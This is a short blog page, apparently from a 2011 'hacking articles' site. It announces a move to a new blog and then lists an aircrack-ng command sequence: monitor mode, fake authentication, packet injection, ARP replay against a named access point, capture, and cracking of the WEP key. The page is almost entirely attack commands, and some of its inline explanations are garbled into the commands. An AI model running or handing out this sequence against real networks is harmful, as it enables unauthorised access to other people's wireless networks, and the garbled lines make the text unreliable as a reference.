Hello friends and readers, Our Blog is been Transferred to our new Website.
All the Post from this blog is also being transferred to our new blog on http://prince-asfi.blogspot.com/
Learn Ethical Hacking And Protect Your Accounts From Hackers !
airmon-ng start wlan1 6starts wifi interface in channel 6
aireplay-ng -6 -e infosec -a 00:1B:11:24:27:2E wlan1-9 means injection
airodump-ng -c 6 –bssid 00:1B:11:24:27:2E -w output wlan1
aireplay-ng -1 0 -e infosec -a 00:1B:11:24:27:2E -h 00:c0:ca:27:e5:6a wlan1-1 means fake authentication
aireplay-ng -1 2 -o 1 -q 10 -e infosec -a 00:1B:11:24:27:2E -h 00:c0:ca:27:e5:6a wlan12 – Reauthenticate every 2 seconds.
aireplay-ng -3 -b 00:1B:11:24:27:2E -h 00:c0:ca:27:e5:6a wlan1
aircrack-ng -b 00:1B:11:24:27:2E output*.cap
© 2011 Punaly Hacking Articles - Designed by Mukund | ToS | Privacy Policy | Sitemap